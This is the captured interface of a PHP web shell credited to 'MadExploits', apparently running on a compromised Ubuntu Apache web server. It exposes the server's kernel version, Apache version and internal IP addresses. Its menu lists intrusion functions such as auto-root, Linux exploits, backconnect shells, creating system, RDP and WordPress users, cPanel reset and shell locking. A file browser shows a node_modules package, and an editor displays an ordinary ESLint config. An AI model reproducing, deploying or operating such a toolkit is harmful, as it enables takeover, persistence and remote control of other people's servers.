Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
deep-equal /
[ HOME SHELL ]
Name
Size
Permission
Action
example
[ DIR ]
drwxrwxr-x
test
[ DIR ]
drwxrwxr-x
.editorconfig
286
B
-rwxrwxr-x
.eslintrc
781
B
-rwxrwxr-x
.nycrc
270
B
-rw-rw-r--
CHANGELOG.md
36.73
KB
-rw-rw-r--
LICENSE
1.11
KB
-rw-rw-r--
assert.js
51
B
-rw-rw-r--
index.js
13.02
KB
-rw-rw-r--
package.json
3.21
KB
-rwxrwxr-x
readme.markdown
2.28
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .eslintrc
{ "root": true, "extends": "@ljharb", "rules": { "complexity": 0, "eqeqeq": [2, "always", { "null": "ignore" }], "func-style": [2, "declaration"], "id-length": 0, "indent": [2, 2], "max-params": [2, 6], "max-statements-per-line": [2, { "max": 2 }], "new-cap": [2, { "capIsNewExceptions": ["GetIntrinsic"] }], "no-magic-numbers": [2, { "ignore": [0, 1] }], }, "globals": { "Int8Array": false, "Uint8Array": false, }, "overrides": [ { "files": "example/**", "rules": { "no-console": 0, "no-magic-numbers": 0, } }, { "files": "test/**", "rules": { "max-lines-per-function": 0, "max-params": 0, "no-magic-numbers": 0, }, }, ], }
Close